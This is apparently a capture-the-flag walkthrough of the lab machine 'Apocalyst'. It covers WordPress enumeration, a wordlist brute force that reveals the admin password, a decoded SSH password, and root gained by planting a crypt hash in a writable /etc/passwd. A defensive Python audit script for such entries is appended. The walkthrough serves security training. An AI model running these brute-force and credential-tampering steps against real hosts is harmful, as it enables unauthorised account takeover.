Difficulty Rating:

Machine: Apocalyst
OS: Linux
Target IP: 10.10.10.46
Source IP: 10.10.15.8

  • Wpscan
$ sudo wpscan -u http://10.10.10.46 -e
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.46/
[+] Started: Sun Aug 20 18:59:45 2017

[!] The WordPress 'http://10.10.10.46/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://apocalyst.htb/?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.10.10.46/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.10.10.46/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.10.10.46/wp-includes/

[+] WordPress version 4.8 (Released on 2017-06-08) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v1.3

[+] Name: twentyseventeen - v1.3
 |  Latest version: 1.3 (up to date)
 |  Location: http://10.10.10.46/wp-content/themes/twentyseventeen/
 |  Readme: http://10.10.10.46/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://10.10.10.46/wp-content/themes/twentyseventeen/style.css
 |  Referenced style.css: http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:00:34 <=====================================================================================================================================> (1545 / 1545) 100.00% Time: 00:00:34

[+] No plugins found

[+] Enumerating installed themes (only ones with known vulnerabilities) ...

   Time: 00:00:05 <=======================================================================================================================================> (281 / 281) 100.00% Time: 00:00:05

[+] No themes found

[+] Enumerating timthumb files ...

   Time: 00:00:51 <=====================================================================================================================================> (2541 / 2541) 100.00% Time: 00:00:51

[+] No timthumb files found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+----------+-----------------------------------+
    | Id | Login    | Name                              |
    +----+----------+-----------------------------------+
    | 1  | falaraki | falaraki – Apocalypse Preparation |
    +----+----------+-----------------------------------+

[+] Finished: Sun Aug 20 19:01:33 2017
[+] Requests Done: 4461
[+] Memory used: 60.945 MB
[+] Elapsed time: 00:01:48
  • Nikto
nikto -h http://10.10.10.46
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.46
+ Target Hostname:    10.10.10.46
+ Target Port:        80
+ Start Time:         2017-08-20 18:58:48 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://apocalyst.htb/?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Server leaks inodes via ETags, header found with file /down/, fields: 0x9d 0x55549bf3e2655 
+ OSVDB-3092: /down/: This might be interesting...
+ OSVDB-3092: /hidden/: This might be interesting...
+ OSVDB-3092: /idea/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /information/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7508 requests: 5 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-08-20 19:33:16 (GMT5.5) (2068 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

  • CeWL (Custom wordlist)
    cewl -w apocalyst_wl http://10.10.10.46
    
  • Dirsearch with the CeWL wordlist
    $ python3 ~/dirsearch/dirsearch.py -u http://10.10.10.46 -w apocalyst_wl -e php -r -f -F -t 100 --plain-text-report=apocalyst_dirsearch01
    
Output is stored in file apocalyst_dirsearch01

/Righteousness looks interesting because it is the only path whose response size differs from all the others.

  • Steghide
    $ steghide extract -sf image.jpg -xf apocalyst_data.txt
    Enter passphrase: 
    wrote extracted data to "apocalyst_data.txt".
    
  • Passphrase is empty, so just press enter.

  • Wpscan to brute-force password with username falaraki
$ sudo wpscan -u http://apocalyst.htb -w ~/apocalyst_data.txt -U falaraki
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://apocalyst.htb/
[+] Started: Sun Aug 20 22:04:47 2017

[!] The WordPress 'http://apocalyst.htb/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://apocalyst.htb/?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://apocalyst.htb/xmlrpc.php
[!] Upload directory has directory listing enabled: http://apocalyst.htb/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://apocalyst.htb/wp-includes/

[+] WordPress version 4.8 (Released on 2017-06-08) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v1.3

[+] Name: twentyseventeen - v1.3
 |  Latest version: 1.3 (up to date)
 |  Location: http://apocalyst.htb/wp-content/themes/twentyseventeen/
 |  Readme: http://apocalyst.htb/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : falaraki Password : Transclisiation

  Brute Forcing 'falaraki' Time: 00:00:19 <============================================================================                                    > (336 / 487) 68.99%  ETA: 00:00:09
  +----+----------+------+-----------------+
  | Id | Login    | Name | Password        |
  +----+----------+------+-----------------+
  |    | falaraki |      | Transclisiation |
  +----+----------+------+-----------------+

[+] Finished: Sun Aug 20 22:05:23 2017
[+] Requests Done: 410
[+] Memory used: 21.344 MB
[+] Elapsed time: 00:00:35
  • After logging in to the WP-admin panel, upload your payload via the file manager.
  • Now you have a shell.
$ ls -la /home/falaraki
total 56
drwxr-xr-x 4 falaraki falaraki 4096 Aug 20 18:26 .
drwxr-xr-x 3 root     root     4096 Jul 26 12:40 ..
-rw-rw-r-- 1 falaraki falaraki 1024 Aug 20 16:46 ..wp-config.php.swp.swp
-rw------- 1 falaraki falaraki  516 Jul 27 12:09 .bash_history
-rw-r--r-- 1 falaraki falaraki  220 Jul 26 12:40 .bash_logout
-rw-r--r-- 1 falaraki falaraki 3771 Jul 26 12:40 .bashrc
drwx------ 2 falaraki falaraki 4096 Jul 26 12:41 .cache
-rw------- 1 falaraki falaraki  164 Aug 20 16:53 .mysql_history
drwxrwxr-x 2 falaraki falaraki 4096 Jul 26 13:52 .nano
-rw-r--r-- 1 falaraki falaraki  655 Jul 26 12:40 .profile
-rw-rw-r-- 1 falaraki falaraki  109 Jul 26 17:29 .secret
-rw-r--r-- 1 falaraki falaraki    0 Jul 26 12:42 .sudo_as_admin_successful
-rw------- 1 falaraki falaraki 3620 Aug 20 18:26 .viminfo
-rw-r--r-- 1 root     root     1024 Jul 27 09:17 .wp-config.php.swp
-rw-rw-r-- 1 falaraki falaraki   33 Jul 26 17:27 user.txt
$ cat /home/falaraki/user.txt
XXXXXXX

User Owned!

  • Contents of /home/falaraki/.secret are base64 encoded.
    $ cat .secret 
    S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=
    
  • After decoding it, you get the SSH password.

  • Password for SSH with username falaraki is Y0uAINtG37TiNgTH!sUzersP4ss
  • Use Python's crypt module to get a SHA-512 crypt hash for the word test (with no salt argument, crypt picks the strongest method available, here $6$ SHA-512)
    >>> import crypt
    >>> crypt.crypt("test")
    '$6$21enH4CDtH6OuY.Y$9LqSeVx51tDBEpEJ..RNG/oAnnE/xrunAqj5gVeMMbpiK5fLbNVaqzVdkv2pX1LOtq2OqYvEn.U8cNYcz10uR/'
    
$ cat /etc/passwd
root:$6$21enH4CDtH6OuY.Y$9LqSeVx51tDBEpEJ..RNG/oAnnE/xrunAqj5gVeMMbpiK5fLbNVaqzVdkv2pX1LOtq2OqYvEn.U8cNYcz10uR/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
falaraki:x:1000:1000:Falaraki Rainiti,,,:/home/falaraki:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
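The root line in the /etc/passwd dump above carries a SHA-512 crypt hash (the $6$ value generated with crypt) where the shadow placeholder x belongs, which only works when a non-root user can rewrite that file. As an added defender-side check that is not part of the original writeup, the following Python audits passwd entries for exactly that condition and reports whether the file is group- or world-writable; the sample data is constructed from the page's root line plus a made-up guest entry.

```python
import os
import re
import stat

# Constructed sample modelled on the page's post-exploitation /etc/passwd:
# root's second field holds a SHA-512 crypt hash instead of the shadow
# placeholder "x". The guest line is made up to show the empty-field case.
SAMPLE_PASSWD = """root:$6$21enH4CDtH6OuY.Y$9LqSeVx51tDBEpEJ..RNG/oAnnE/xrunAqj5gVeMMbpiK5fLbNVaqzVdkv2pX1LOtq2OqYvEn.U8cNYcz10uR/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
falaraki:x:1000:1000:Falaraki Rainiti,,,:/home/falaraki:/bin/bash
guest::1001:1001::/home/guest:/bin/bash
"""

# $<id>$<salt>$<hash>; the id selects the crypt algorithm.
CRYPT_RE = re.compile(r"^\$(?P<id>[0-9a-z]+)\$(?P<salt>[^$]*)\$(?P<hash>[^$]+)$")
ALGOS = {"1": "MD5", "5": "SHA-256", "6": "SHA-512", "2b": "bcrypt", "y": "yescrypt"}

def audit_passwd(text):
    """One finding per entry whose password field is not a shadow placeholder.
    A hash here means whoever wrote the file chose that account's password
    (this is how the writeup takes root); an empty field means no password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "user": fields[0], "issue": "malformed entry"})
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw in ("x", "*", "!", "!!"):
            continue  # password lives in /etc/shadow or the account is locked
        if pw == "":
            findings.append({"line": lineno, "user": user, "uid": uid, "issue": "empty password field"})
            continue
        m = CRYPT_RE.match(pw)
        algo = ALGOS.get(m.group("id"), "unknown id " + m.group("id")) if m else "non-crypt value"
        findings.append({"line": lineno, "user": user, "uid": uid, "issue": f"hash stored in passwd ({algo})"})
    return findings

def passwd_writable_by_others(path="/etc/passwd"):
    """True if the group or world write bit is set, i.e. a non-root local user
    could rewrite the file. None if the path does not exist."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return None
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
```

On a live host, run audit_passwd(open("/etc/passwd").read()) together with passwd_writable_by_others(); any finding on a UID 0 account, or True from the mode check, is the misconfiguration this box turns on.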
User and Root owned!!

Share the fun!